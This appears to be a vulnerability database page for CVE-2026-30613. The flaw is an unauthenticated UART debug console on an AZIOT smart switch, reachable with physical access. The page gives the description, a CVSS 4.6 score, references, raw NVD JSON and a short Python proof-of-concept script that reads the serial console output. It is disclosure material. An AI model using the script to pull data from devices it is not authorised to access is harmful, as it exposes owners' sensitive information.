CVE-2026-30613

Description

An information disclosure vulnerability exists in AZIOT 1 Node Smart Switch (16amp)- WiFi/Bluetooth Enabled Software Version: 1.1.9 due to improper access control on the UART debug interface. An attacker with physical access can connect to the UART interface and obtain sensitive information from the serial console without authentication.

CVSS Details

CVSS Score

4.6

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

AZIOT 1 Node Smart Switch (16amp) Software Version 1.1.9

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
# PoC for CVE-2026-30613: UART Information Disclosure
# This script demonstrates how to read data from an unauthenticated UART interface.
# Requires physical access and a USB-to-TTL adapter.

import serial
import time

def read_uart_data(port='/dev/ttyUSB0', baud_rate=115200):
    try:
        # Configure serial connection (Adjust baud rate as per device spec)
        ser = serial.Serial(port, baud_rate, timeout=1)
        print(f"[+] Connected to {port} at {baud_rate} baud.")
        print("[+] Reading data stream (Press Ctrl+C to stop)...")
        
        while True:
            if ser.in_waiting > 0:
                # Read and decode sensitive data from serial console
                data = ser.readline().decode('utf-8', errors='ignore').strip()
                if data:
                    print(data)
            time.sleep(0.1)
            
    except serial.SerialException as e:
        print(f"[-] Serial Error: {e}")
    except KeyboardInterrupt:
        print("\n[!] Exiting...")
    finally:
        if 'ser' in locals() and ser.is_open:
            ser.close()

if __name__ == "__main__":
    # Usage: python3 poc.py
    read_uart_data()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-30613
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-30613
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-30613/
[4] VulDB https://vuldb.com/cve/CVE-2026-30613
[5] http://aziot.com
[6] https://github.com/dumbermore/tuya/blob/main/README.md

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-30613", "sourceIdentifier": "[email protected]", "published": "2026-04-06T18:16:41.440", "lastModified": "2026-04-07T15:17:38.420", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "An information disclosure vulnerability exists in AZIOT 1 Node Smart Switch (16amp)- WiFi/Bluetooth Enabled Software Version: 1.1.9 due to improper access control on the UART debug interface. An attacker with physical access can connect to the UART interface and obtain sensitive information from the serial console without authentication."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.6, "baseSeverity": "MEDIUM", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "references": [{"url": "http://aziot.com", "source": "[email protected]"}, {"url": "https://github.com/dumbermore/tuya/blob/main/README.md", "source": "[email protected]"}]}}